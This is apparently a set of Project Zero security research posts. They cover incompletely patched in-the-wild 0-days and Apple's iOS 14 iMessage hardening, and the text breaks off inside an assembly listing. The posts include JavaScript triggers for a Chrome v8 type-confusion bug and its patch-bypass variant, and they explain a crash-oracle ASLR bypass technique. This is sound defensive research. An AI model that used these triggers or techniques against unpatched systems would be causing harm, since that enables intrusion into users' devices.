Six years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: how do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There’s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would have helped the attackers discover this vulnerability in Apple’s code.

Exploited 0-days not properly fixed… 😭

Three vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor.

Product           | Vulnerability that was exploited in-the-wild | 2nd patch
Internet Explorer | CVE-2020-0674   | CVE-2020-0968
Google Chrome     | CVE-2019-13764* | CVE-2020-6383
Microsoft Windows | CVE-2020-0986   | CVE-2020-17008/CVE-2021-1648

* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild

Internet Explorer JScript CVE-2020-0674

In the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, the ensuing patch still didn’t comprehensively fix all of the variants; Microsoft patched CVE-2020-0968 in April 2020. We show the trigger in the section above.

Google Chrome CVE-2019-13764

CVE-2019-13764 in Chrome is an interesting case. When it was patched in November 2019, it was not known to be exploited in-the-wild. Instead, it was reported by security researchers Soyeon Park and Wen Xu. Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That’s when he realized that the patch didn’t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei’s blog post, “Chrome Infinity Bug”.

To summarize, the vulnerability is a type confusion in Chrome’s v8 JavaScript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8’s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity; -0 and NaN do not belong to the integer type though. Another interesting aspect of v8’s integer type is that it is not closed under addition, meaning that adding two integers doesn’t always result in an integer. An example of this is +Infinity + -Infinity = NaN.

Therefore, the following line is sufficient to trigger CVE-2019-13764. Note that this line will not show any observable crash effects, and the road to making this vulnerability exploitable is quite long; check out this blog post if you’re interested!

for (var i = -Infinity; i < 0; i += Infinity) { }

The patch that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.

var increment = -Infinity;
var k = 0;

// The initial loop value is 0 and the increment is -Infinity.
// This is permissible because 0 + -Infinity = -Infinity, an integer.
for (var i = 0; i < 1; i += increment) {
  if (i == -Infinity) {
    // Once the loop variable equals -Infinity (one loop through),
    // the increment is changed to +Infinity. -Infinity + +Infinity = NaN
    increment = +Infinity;
  }
  if (++k > 10) {
    break;
  }
}

To “revive” the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. This incomplete fix was reported to Chrome in February 2020. The second patch was more conservative: it bailed out as soon as it detected that the increment can be +Infinity or -Infinity.

Unfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible “type confusions”. Again, check out Sergei’s blog post if you’re interested in more details.

This is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it’s important to work towards “correct & comprehensive” patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry knows there is a detection gap in our ability to detect 0-days exploited in-the-wild. We don’t find and detect all exploited 0-days and we certainly don’t find them all in a timely manner.

Windows splwow64 CVE-2020-0986

This vulnerability has already been discussed in the previous section on variants. After Kaspersky reported that CVE-2020-0986 was actively exploited as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only disclosed as exploited in-the-wild in August 2020.

Microsoft’s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message, with offsets. This didn’t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. This issue was reported to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later. This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.

Correct and comprehensive patches

We’ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes.

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done. 

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

While the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.

In 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny, and we hope to expand our variant analysis work to other vulnerabilities as well. We hope more researchers will join us in this work. (If you’re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: my talk at BluehatIL 2020 and Ki Chan Ahn at OffensiveCon 2020.)

In addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone. Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.

A Look at iMessage in iOS 14

28 January 2021 at 19:47

Posted By Samuel Groß, Project Zero

On December 20, Citizenlab published “The Great iPwn”, detailing how “Journalists [were] Hacked with Suspected NSO Group iMessage ‘Zero-Click’ Exploit”. Of particular interest is the following note: “We do not believe that [the exploit] works against iOS 14 and above, which includes new security protections”. Given that it has also now been almost exactly one year since we published the Remote iPhone Exploitation blog post series, in which we described how an iMessage 0-click exploit can work in practice and gave a number of suggestions on how similar attacks could be prevented in the future, now seemed like a great time to dig into the security improvements in iOS 14 in more detail and explore how Apple has hardened their platform against 0-click attacks.

The content of this blog post is the result of a roughly one-week reverse engineering project, mostly performed on an M1 Mac Mini running macOS 11.1, with the results, where possible, verified to also apply to iOS 14.3, running on an iPhone XS. Due to the nature of this project and the limited timeframe, it is possible that I have missed some relevant changes or made mistakes interpreting some results. Where possible, I’ve tried to describe the steps necessary to verify the presented results, and would appreciate any corrections or additions.

The blog post will start with an overview of the major changes Apple implemented in iOS 14 which affect the security of iMessage. Afterwards, and mostly for the readers interested in the technical details, each of the major improvements is described in more detail while also providing a walkthrough of how it was reverse engineered. At least for the technical details, it is recommended to briefly review the blog post series from last year for a basic introduction to iMessage and the exploitation techniques used to attack it.

Overview

Memory corruption based 0-click exploits typically require at least the following pieces:

  1. A memory corruption vulnerability, reachable without user interaction and ideally without triggering any user notifications
  2. A way to break ASLR remotely
  3. A way to turn the vulnerability into remote code execution
  4. (Likely) A way to break out of any sandbox, typically by exploiting a separate vulnerability in another operating system component (e.g. a userspace service or the kernel)

With iOS 14, Apple shipped a significant refactoring of iMessage processing, and made all four parts of the attack harder. This is mainly due to three central changes:

1. The BlastDoor Service

One of the major changes in iOS 14 is the introduction of a new, tightly sandboxed “BlastDoor” service which is now responsible for almost all parsing of untrusted data in iMessages (for example, NSKeyedArchiver payloads). Furthermore, this service is written in Swift, a (mostly) memory safe language which makes it significantly harder to introduce classic memory corruption vulnerabilities into the code base.

The following diagram shows the rough new iMessage processing pipeline, with the name of the respective service process shown at the top of each box.

The iMessage processing pipeline in iOS 14 and macOS Big Sur. An iMessage arrives in apsd as a push notification from Apple’s servers. From there, it is first passed to identityservicesd, which decrypts its payload using the local iMessage private key, then to imagent. Imagent then delegates the majority of the parsing work to the BlastDoor service. Afterwards, if the iMessage contains any attachments, they are downloaded from iCloud servers by IMTransferAgent. If the iMessage contains plugin data (such as a URL with a preview image), the serialized plugin data is again processed by the BlastDoor service and a preview message is generated from it. Finally, IMDPersistenceAgent stores the iMessage into the messages database, triggers a user notification, and returns to imagent, which sends the delivery receipt to the iMessage servers and thus to the sender.

As can be seen, the majority of the processing of complex, untrusted data has been moved into the new BlastDoor service. Furthermore, this design with its 7+ involved services allows fine-grained sandboxing rules to be applied; for example, only the IMTransferAgent and apsd processes are required to perform network operations. As such, all services in this pipeline are now properly sandboxed (with the BlastDoor service arguably being sandboxed the strongest).

2. Re-randomization of the Dyld Shared Cache Region

Historically, ASLR on Apple’s platforms had one architectural weakness: the shared cache region, containing most of the system libraries in a single prelinked blob, was only randomized per boot, and so would stay at the same address across all processes. This turned out to be especially critical in the context of 0-click attacks, as it allowed an attacker, able to remotely observe process crashes (e.g. through timing of automatic delivery receipts), to infer the base address of the shared cache and as such break ASLR, a prerequisite for subsequent exploitation steps.

However, with iOS 14, Apple has added logic to specifically detect this kind of attack, in which case the shared cache is re-randomized for the targeted service the next time it is started, thus rendering this technique useless. This should make bypassing ASLR in a 0-click attack context significantly harder or even impossible (apart from brute force) depending on the concrete vulnerability.

3. Exponential Throttling to Slow Down Brute Force Attacks

To limit an attacker’s ability to retry exploits or brute force ASLR, the BlastDoor and imagent services are now subject to a newly introduced exponential throttling mechanism enforced by launchd, causing the interval between restarts after a crash to double with every subsequent crash (up to an apparent maximum of 20 minutes). With this change, an exploit that relied on repeatedly crashing the attacked service would now likely require in the order of multiple hours to roughly half a day to complete instead of a few minutes.
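As a back-of-the-envelope illustration, the sketch below models the cumulative delay an attacker would face. Only the doubling behavior and the roughly 20-minute cap are described above; the 10-second starting interval is our assumption:

# Rough model of exponential restart throttling: the delay doubles with
# every crash, capped at 20 minutes. The 10s starting value is assumed.
def total_wait(crashes, base=10, cap=20 * 60):
    delay, total = base, 0
    for _ in range(crashes):
        total += delay
        delay = min(delay * 2, cap)
    return total

for n in (8, 32, 64):
    print(f"{n:3d} crashes -> ~{total_wait(n) / 3600:.1f} hours of waiting")
# ->  8 crashes -> ~0.7h, 32 -> ~8.7h, 64 -> ~19.4h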

The remainder of this blog post will now look at each of these three changes in greater depth.

The BlastDoor Service

The new BlastDoor service and its role in the processing of iMessages can be studied by following the flow of an incoming iMessage. On the wire, a simple text iMessage would look something like this, encoded as binary plist:

{
    // Group UUID
    gid = "008412B9-A4F7-4B96-96C3-70C4276CB2BE";
    // Group protocol version
    gv = 8;
    // Chat participants
    p = (
        "mailto:[email protected]",
        "mailto:[email protected]"
    );
    // Participants version
    pv = 0;
    // Message being replied to, usually the last message in the chat
    r = "6401430E-CDD3-4BC7-A377-7611706B431F";
    // The plain text content
    t = "Hello World!";
    // Probably some other version number
    v = 1;
    // The rich text content
    x = "<html><body>Hello World!</body></html>";
}

As such, the minimal steps required to parse it are:

  1. If necessary, decompress the binary data
  2. Decode the plist from its binary serialization format
  3. Extract its various fields and ensure they have the correct type
  4. Decode the `x` key if present, using an XML decoder
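A rough Python sketch of these four steps is below, using standard-library decoders as stand-ins for the actual CoreFoundation/libxml implementations; the gzip check and the exact field handling are illustrative assumptions:

# Minimal sketch of the four parsing steps for a plain-text iMessage.
# Stand-in code: the real pipeline uses CoreFoundation/libxml, not Python.
import gzip, plistlib
from xml.etree import ElementTree

def parse_imessage(raw: bytes) -> dict:
    # 1. If necessary, decompress the binary data
    if raw[:2] == b"\x1f\x8b":              # gzip magic (assumed check)
        raw = gzip.decompress(raw)
    # 2. Decode the plist from its binary serialization format
    msg = plistlib.loads(raw)
    # 3. Extract fields and ensure they have the correct type
    if not isinstance(msg.get("t"), str):
        raise ValueError("missing/invalid plain text body")
    out = {"text": msg["t"], "participants": list(msg.get("p", []))}
    # 4. Decode the `x` key if present, using an XML decoder
    if "x" in msg:
        out["rich_text"] = ElementTree.fromstring(msg["x"])
    return out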

Previously, all of this work happened in imagent. With iOS 14, however, it all moved into the new BlastDoor service. While the main processing flow still starts in imagent, which receives the raw but unencrypted payload bytes from identityservicesd (part of the IDS framework) in -[IMDiMessageIDSDelegate service:account:incomingTopLevelMessage:fromID:messageContext:], messages are then more or less immediately forwarded to the BlastDoor service through +[IMBlastdoor sendDictionary:withCompletionBlock:] which creates the reply handler block and then calls -[IMMessagesBlastDoorInterface diffuseTopLevelDictionary:resultHandler:]. At that point processing ends up in Swift code that deserializes the binary payload and sends it to the BlastDoor service over XPC.

Inside BlastDoor, the work mostly happens in BlastDoor.framework and MessagesBlastDoorService. As most of it is written in Swift, it is fairly unpleasant to statically reverse engineer it (no symbols, many virtual calls, swift runtime code sprinkled all over the place), but fortunately, that is also not really necessary for the purpose of this blog post. However, it is worth noting that while the high level control flow logic is written in Swift, some of the parsing steps still involve the existing ObjectiveC or C implementations. For example, XML is being parsed by libxml, and the NSKeyedArchiver payloads by the ObjectiveC implementation of NSKeyedUnarchiver.

The responses from BlastDoor can be seen by breaking on the reply handler function in imagent (the function can be found in +[IMBlastdoor sendDictionary:withCompletionBlock:] or by searching for XREFs to the string “Blastdoor response %p received (command: %hhu, guid: %@)” in IMDaemonCore.framework). A typical BlastDoor response for a simple text message is shown below:

(lldb) po $x2
TextMessage(
    metadata: BlastDoor.Metadata(
        messageGUID: D391CC96-9CC6-44C6-B827-1DEB0F252529,
        timestamp: Optional(1610108299117662350),
        wantsDeliveryReceipt: true,
        wantsCheckpointing: false,
        storageContext: BlastDoor.Metadata.StorageContext(
            isFromStorage: false, isLastFromStorage: false
        )
    ),
    messageSubType: MessageType.textMessage(BlastDoor.Message(
        plainTextBody: Optional("Hello World"),
        plainTextSubject: nil,
        content: Optional(BlastDoor.AttributedString(
            attributes: [
                BlastDoor.BaseWritingDirectionAttribute(
                    range: Range(0..<11), direction: WritingDirection.natural
                ),
                BlastDoor.MessagePartAttribute(
                    range: Range(0..<11), partNumber: 0
                )
            ],
            string: "Hello World"
        )),
        _participantDestinationIdentifiers: [
            "mailto:[email protected]",
            "mailto:[email protected]"
        ],
        attributionInfo: []
    )),
    encryptionType: BlastDoor.TextMessage.EncryptionType.pair_ec,
    replyToGUID: Optional(6401430E-CDD3-4BC7-A377-7611706B431F),
    _threadIdentifierGUID: nil,
    _expressiveSendStyleIdentifier: nil,
    _groupID: Optional("008412B9-A4F7-4B96-96C3-70C4276CB2BE"),
    currentGroupName: nil,
    groupParticipantVersion: Optional(0),
    groupProtocolVersion: Optional(8),
    groupPhotoCreationTime: nil,
    messageSummaryInfo: nil,
    nicknameInformation: nil,
    truncatedNicknameRecordKey: nil
)

One can roughly associate every field in this data structure with parts of the on-wire iMessage format. For example, the plainTextBody field contains the content of the `t` field, while the content field corresponds to the content of the `x` field.

Besides simple text messages, iMessages can additionally contain attachments (essentially arbitrary files which are encrypted and temporarily uploaded to iCloud) as well as rather complex serialized NSKeyedArchiver archives, which have been the source of bugs in the past.

For these types of iMessages, the following additional parsing steps are necessary:

  1. Unpack attachment metadata (NSKeyedArchiver format)
  2. Download attachments from iCloud server
  3. Deserialize NSKeyedArchiver plugin archives and generate a preview for the notification

As an example, consider what happens when a user sends a link to a website over iMessage. In that case, the sending device will first render a preview of the webpage and collect some metadata about it (such as the title and page description), then pack those fields into an NSKeyedArchiver archive. This archive is then encrypted with a temporary key and uploaded to the iCloud servers. Finally, the link as well as the decryption key are sent to the receiver as part of the iMessage. In order to create a useful user notification about the incoming iMessage, this data has to be processed by the receiver on a 0-click code path. As that again involves a fair amount of complexity, it is also done inside BlastDoor: after receiving the BlastDoor reply from above and realizing that the message contains an attachment, imagent first instructs IMTransferAgent to download and decrypt the iCloud attachment. Afterwards, it will call into -[IMTranscodeController decodeiMessageAppPayload:bundleID:completionBlock:blockUntilReply:] which forwards the relevant data to the IMTranscoderAgent, which then proceeds into +[IMAttachmentBlastdoor sendBalloonPluginPayloadData:withBundleIdentifier:completionBlock:] and finally calls -[IMMessagesBlastDoorInterface defuseBalloonPluginPayload:withIdentifier:resultHandler:].

In the BlastDoor service, the plugin data decoding is then again performed in Swift, and dispatched to the corresponding plugin type, as determined by the plugin id. For RichLinks (plugin id com.apple.messages.URLBalloonProvider), processing ends up in LinkPresentation.MessagesPayload.init(dataRepresentation:), which deserializes the NSKeyedArchiver payload to extract the preview image and URL metadata from it in order to generate a preview message.

Sandboxing

The sandbox profile can be found in System/Library/Sandbox/Profiles/blastdoor.sb and is attached at the end of this blog post (Attachment 1). It appears to be identical on iOS and macOS. The profile can be studied statically or dynamically, for example by using the sandbox-exec tool:

> echo "(allow process-exec (literal \"$(pwd)/test\"))" >> ./blastdoor.sb

> clang -o test test.c   # try to open files, network connections, etc.

> sandbox-exec -f ./blastdoor.sb ./test
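The test.c referenced above isn't shown in the post; a minimal hypothetical version, just probing a couple of operations the profile should deny, could look like this:

#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
    // File access outside the allowed system paths should be denied.
    FILE *f = fopen("/etc/hosts", "r");
    printf("fopen(/etc/hosts): %s\n", f ? "allowed" : strerror(errno));
    if (f) fclose(f);

    // Outbound network access should be denied as well.
    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port = htons(80),
        .sin_addr = { .s_addr = htonl(INADDR_LOOPBACK) },
    };
    int rc = (s >= 0) ? connect(s, (struct sockaddr *)&addr, sizeof(addr)) : -1;
    printf("connect(127.0.0.1:80): %s\n", rc == 0 ? "allowed" : strerror(errno));
    if (s >= 0) close(s);
    return 0;
}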

The sandbox profile states:

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.

And indeed, the sandbox profile is quite tight:

  • only a handful of local IPC services, namely diagnosticd, logd, opendirectoryd, syslogd, and notifyd, can be reached
  • almost all file system interaction is blocked
  • any interaction with IOKit drivers (historically a big source of vulnerabilities) is forbidden
  • outbound network access is denied

Furthermore, the profile makes use of syscall filtering to restrict the interactions with the core kernel. However, as of now the syscall filter seems to be in “permissive” mode:

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

As such, the BlastDoor service is still allowed to perform any syscall, but it is to be expected that the syscall filtering will soon be put into “enforcement mode”, which would further boost its effectiveness.

Crash Monitoring?

An interesting side effect of the new processing pipeline is that imagent is now able to detect when an incoming message caused a crash in BlastDoor (it will receive an XPC error). Even more interesting is the fact that imagent appears to be informing Apple’s servers about such events, as can be seen by setting a breakpoint on -[APSConnectionServer handleSendOutgoingMessage:] in apsd, the daemon responsible for implementing Apple’s push services (on top of which iMessage is built). Displaying the outgoing message will show the following:

(lldb) po [$x2 dictionaryRepresentation]

{

    APSCritical = 1;

    APSMessageID = 543;

    APSMessageIdentifier = 1520040396;

    APSMessageTopic = "com.apple.madrid";

    APSMessageUserInfo =     {

        c = 115;

        fR = 13500;

        fRM = "c-100-BlastDoor.Explosion-1-com.apple.BlastDoor.XPC-ServiceCrashed";

        fU = {length = 16, bytes = 0x3a4912626c9645f98cb26c7c2d439520};

        i = 1520040396;

        nr = 1;

        t = {length = 32, bytes = ... };

        ua = "[macOS,11.1,20C69,Macmini9,1]";

        v = 7;

    };

    APSOutgoingMessageSenderTokenName = 501;

    APSPayloadFormat = 1;

    APSTimeout = 120;

    APSTimestamp = "2021-01-06 19:52:10 +0000";

}

As can be seen, imagent is apparently informing the iMessage servers that the message with the UUID 0x3a4912626c9645f98cb26c7c2d439520 (fU key) has caused a crash in BlastDoor.

It is unclear what the purpose of this is without access to the server’s code. While these notifications may simply be used for statistical purposes, they would also give Apple a fairly clear signal about attacks against iMessage involving brute-force and a somewhat weaker signal about any failed exploits against the BlastDoor service.

In my experiments, after observing one of these crash notifications, the server would start directly sending delivery receipts to the sender for messages that hadn't actually been processed by the receiver yet. Possibly this is another, independent effort to break the crash oracle technique by confusing the sender, but that is hard to verify without access to the code running on the server. In any case, it is worth noting that this “spoofing” of delivery receipts by the server is generally possible as the message UUID, which is more or less the only content of a delivery receipt, is part of the non-end2end encrypted payload and is thus known to the server (break on -[APSConnectionServer handleSendOutgoingMessage:] and inspect outgoing iMessages to verify this, the UUID will be in the U key, while the e2e-encrypted data will be in the P key). This is most likely necessary so the server can track which messages have already been delivered and which ones it still needs to keep around for delivery in the future.

Shared Cache Resliding

Previously, when exploiting an iMessage memory corruption bug, a “crash oracle” could be used to reveal the location of the shared cache region in memory: the attacker would trigger the memory corruption bug in a way that would cause an access to a memory location somewhere in the region 0x180000000 - 0x280000000 (where the shared cache can be mapped). If the memory was valid, no crash would occur and imagent would then send a delivery receipt to the attacker. However, if a crash occurred, no such receipt would be delivered, informing the attacker that the address was unmapped. Through clever selection of the queried addresses, the location of the shared cache could be revealed in logarithmic time, with only about 20 messages.
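To make “logarithmic time” concrete, the sketch below simulates the search; oracle() is a hypothetical stand-in for “send a message that dereferences addr and see whether a delivery receipt comes back”, with SECRET_BASE playing the role of the randomized cache base:

#include <stdint.h>
#include <stdio.h>

// Simulated oracle: in a real attack this would send a message probing
// `addr` and report whether a delivery receipt arrived (address mapped)
// or not (the receiver crashed, address unmapped).
static const uint64_t SECRET_BASE = 0x1c3000000;  // arbitrary stand-in value
static int probes;
static int oracle(uint64_t addr) { probes++; return addr >= SECRET_BASE; }

int main(void) {
    // Assumption: addresses below the cache base are unmapped and addresses
    // at or above it are mapped, so the mapped/unmapped boundary is the base.
    uint64_t lo = 0x180000000, hi = 0x280000000;
    while (hi - lo > 0x100000) {          // narrow down to 1MiB precision
        uint64_t mid = lo + (hi - lo) / 2;
        if (oracle(mid))
            hi = mid;                     // mapped: base is at or below mid
        else
            lo = mid;                     // unmapped: base is above mid
    }
    printf("base ~ 0x%llx after %d probes\n", (unsigned long long)hi, probes);
    return 0;
}

Narrowing the 4GiB range down to 1MiB takes 12 probes here; pushing on to page granularity adds a few more, in line with the roughly 20 messages mentioned above.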

However, with iOS 14 Apple has added a mechanism to re-randomize the location of the shared cache region for an “attacked” process, thus breaking a fundamental assumption of this technique and rendering it ineffective. This is significant as the crash oracle technique was one of very few, if not the only, fairly generic ASLR bypass techniques usable in 0-click iMessage attacks.

To understand how the shared cache resliding works, one can start by looking at the kernel. In iOS 14, the kernel can now have two active shared cache regions: the “regular” region and a “reslided” region. During an attack, the following then happens:

  1. When an attacker attempts to use a crash-oracle-based technique, the attacked process would quickly end up accessing unmapped memory in the range 0x180000000 - 0x280000000 (where the shared cache is mapped) and crash
  2. The kernel handles the segmentation fault generated by the CPU, and sets a specific flag in the crash info that signals that the crash happened inside the shared cache region
  3. At the same time, the kernel will mark the currently active reslided shared cache region (if one exists) as stale, causing it to be recreated and thus re-randomized the next time it is used
  4. launchd (as the parent process of the crashed service) receives the crash info, notices the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and sets the ReslideSharedCache property on the service associated with the crashed process (see `launchctl procinfo $pid` and search for `reslide shared cache = 1`)
  5. The next time the service is restarted, launchd then adds the POSIX_SPAWN_RESLIDE attribute for posix_spawn due to the ReslideSharedCache property
  6. In the kernel, this flag now causes the newly created process to be given the reslided shared cache image. However, as no active reslided region currently exists (the previous one was marked as stale in step 3.), a new one is created at a newly randomized address.

The result of this is that whenever an attacker attempts to use a crash-oracle to break ASLR, the attacked service would receive a different shared cache region every time it is launched, thus preventing the attack from succeeding. For the time being, this feature appears to only be active on iOS, but it would be expected to come to macOS as well.

While this mechanism would in principle also protect 3rd party apps from similar attacks, protection for those is currently somewhat weaker, likely in order to first evaluate the real-world performance impact of this change (the shared cache is a significant performance optimization of the OS). In particular, step 3 is currently only performed if the crashing process is a platform binary (essentially binaries that ship with the OS and are directly signed by Apple) such as the services handling iMessages. However, for 3rd party processes, it would only happen if the global vm_shared_region_reslide_restrict is set to zero:

/*

 * Flag to control what processes should get shared cache randomize resliding

 * after a fault in the shared cache region:

 *

 * 0 - all processes get a new randomized slide

 * 1 - only platform processes get a new randomized slide

 */

This flag is controlled by the vm_shared_region_reslide_restrict bootarg and currently seems to be set to one. In essence, for 3rd party apps this means:

  1. When the attacked process first crashes, the kernel will still set the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and launchd will add the ReslideSharedCache property, but the current reslided region won’t be invalidated
  2. The service is then restarted and now uses the “reslided” shared cache region
  3. When the service crashes the next time, and if that service is the only one currently using the reslided shared cache region (which should usually be the case, but could possibly be influenced by the attacker), the region’s refcount drops to zero, and the shared cache region is marked for removal.
  4. However, removal will only actually happen after two minutes. As such, if the service is restarted within two minutes, it will receive the same shared cache region at the same location in memory.

As a result, a third-party app could still be attacked through a crash-oracle technique if it automatically sends some form of delivery receipt to the sender and restarts quickly enough after a crash. This could, however, be prevented for example by enabling ExponentialThrottling for these services. Ideally, and assuming that the performance penalty is reasonable, Apple would enable re-randomization for all apps in the future.

Exponential Throttling

Another thing we suggested back in 2019 was to limit the number of attempts an attacker gets when attempting to exploit a vulnerability. This was mostly important to defend against the crash-oracle technique, but would also help to prevent brute force attacks (e.g., given enough attempts, one could simply brute force the location of the shared cache region). The new ExponentialThrottling feature in launchd seems to achieve just that.

To use it, a system daemon or agent has to opt-in by setting "_ExponentialThrottling = 1" in its Info.plist (essentially the service metadata), as can be seen below for the BlastDoor service:

> plutil -p /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/Versions/A/XPCServices/MessagesBlastDoorService.xpc/Contents/Info.plist

{

  "CFBundleDisplayName" => "MessagesBlastDoorService"

  "CFBundleExecutable" => "MessagesBlastDoorService"

  "CFBundleIdentifier" => "com.apple.MessagesBlastDoorService"

  ...

  "XPCService" => {

    "_ExponentialThrottling" => 1

  }

}

Apart from the BlastDoor service, it is also used for imagent:

> plutil -p /System/Library/LaunchAgents/com.apple.imagent.plist

{

  "_ExponentialThrottling" => 1

  ...

but doesn’t appear to be used for any other service, as can, for example, be seen by looking at the output of the launchctl dumpstate command, which will only show “exponential throttling = 1” for com.apple.imagent and com.apple.MessagesBlastDoorService.

Presumably, the _ExponentialThrottling property instructs launchd (the macOS and iOS init process) to delay subsequent restarts of a crashing service. While it is somewhat challenging to statically reverse engineer launchd due to the lack of source code or binary symbols, it is fortunately fairly easy to experimentally determine the impact of the _ExponentialThrottling property, for example by installing a custom daemon that writes the current timestamp to a file before crashing; a minimal sketch of such a daemon follows.
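The following is a hypothetical reconstruction of that test daemon (the log path is an arbitrary choice):

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(void) {
    // Log the start time, then crash so launchd has to restart the service.
    FILE *f = fopen("/tmp/crashloop.log", "a");  // arbitrary log location
    if (f) {
        time_t now = time(NULL);
        fprintf(f, "Service started on %s", ctime(&now));  // ctime adds '\n'
        fclose(f);
    }
    abort();
}

By default, that is without ExponentialThrottling, one would see the following: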

Service started on Wed Jan  6 13:56:03 2021

Service started on Wed Jan  6 13:56:13 2021

Service started on Wed Jan  6 13:56:23 2021

Service started on Wed Jan  6 13:56:33 2021

As can be seen, by default, a service is, at the earliest, restarted ten seconds after it was previously started. However, using the following service plist which enables ExponentialThrottling:

> # Start service with

> # launchctl bootstrap system /Library/LaunchDaemons/net.saelo.test.plist

> plutil -p /Library/LaunchDaemons/net.saelo.test.plist

{

  "_ExponentialThrottling" => 1

  "KeepAlive" => 1

  "Label" => "net.saelo.test"

  "POSIXSpawnType" => "Interactive"

  "Program" => "/path/to/program"

}

One can observe the following:

Service started on Wed Jan  6 10:42:43 2021

Service started on Wed Jan  6 10:42:53 2021 (+10s)

Service started on Wed Jan  6 10:43:03 2021 (+10s)

Service started on Wed Jan  6 10:43:13 2021 (+10s)

Service started on Wed Jan  6 10:43:33 2021 (+20s)

Service started on Wed Jan  6 10:44:13 2021 (+40s)

Service started on Wed Jan  6 10:45:33 2021 (+80s)

Service started on Wed Jan  6 10:48:13 2021 (+160s [~2.5m])

Service started on Wed Jan  6 10:53:33 2021 (+320s [~5m])

Service started on Wed Jan  6 11:04:13 2021 (+640s [~10m])

Service started on Wed Jan  6 11:24:13 2021 (+20m)

Service started on Wed Jan  6 11:44:13 2021 (+20m)

Service started on Wed Jan  6 12:04:13 2021 (+20m)

Here, the exponential increase in the time between subsequent restarts is clearly visible, and goes up to an apparent maximum of 20 minutes. And indeed, launchd does contain the following bit of code in a function presumably responsible for computing the next restart delay (search for XREFs to the string "%s: service throttled by %llu seconds"):

  if ( delay >= 1200 )

    result = 1200LL;                 // 20 minutes

  else

    result = delay;

With this change, an exploit that relied on brute force would now only get one attempt every 20 minutes instead of every 10 seconds.

(Upcoming?) ObjectiveC ISA PAC

The PoC exploit against iMessage on iOS 12.4 relied heavily on faking ObjectiveC objects to gain a form of arbitrary code execution despite the presence of pointer authentication (PAC). This was mainly possible because the ISA field, containing the pointer to the Class object and thus making a piece of memory appear like a valid ObjectiveC object, was not protected through PAC and could thus be faked. With iOS 14, this now seems to be changing: while previously, the top 19 bits of the ISA value contained the inline refcount, it now appears that this field has been reduced to 9 bits (of which the LSB appears to be reserved for some purpose, leaving an 8-bit inline refcount, see the bit shifting logic in objc_release or objc_retain), while the freed-up bits now hold a PAC, as can be seen in objc_rootAllocWithZone in libobjc.dylib:

    ; Allocate the object

    BL              j__calloc_3

    CBZ             X0, loc_1953DA434

    MOV             X8, X0

    ; “Tag” the address with a constant to get a PAC modifier value

    MOVK            X8, #0x6AE1,LSL#48        

    MOV             X9, X19

    ; Compute PAC of Class pointer with tagged object address as modifier

    PACDA           X9, X8

    ; Clear top 9 bits (inline refcnt) and bottom 3 bits (other bitfields)       

    AND             X8, X9, #0x7FFFFFFFFFFFF8

    ; Set LSB and inline refcount to one

    MOV             X9, #0x100000000000001
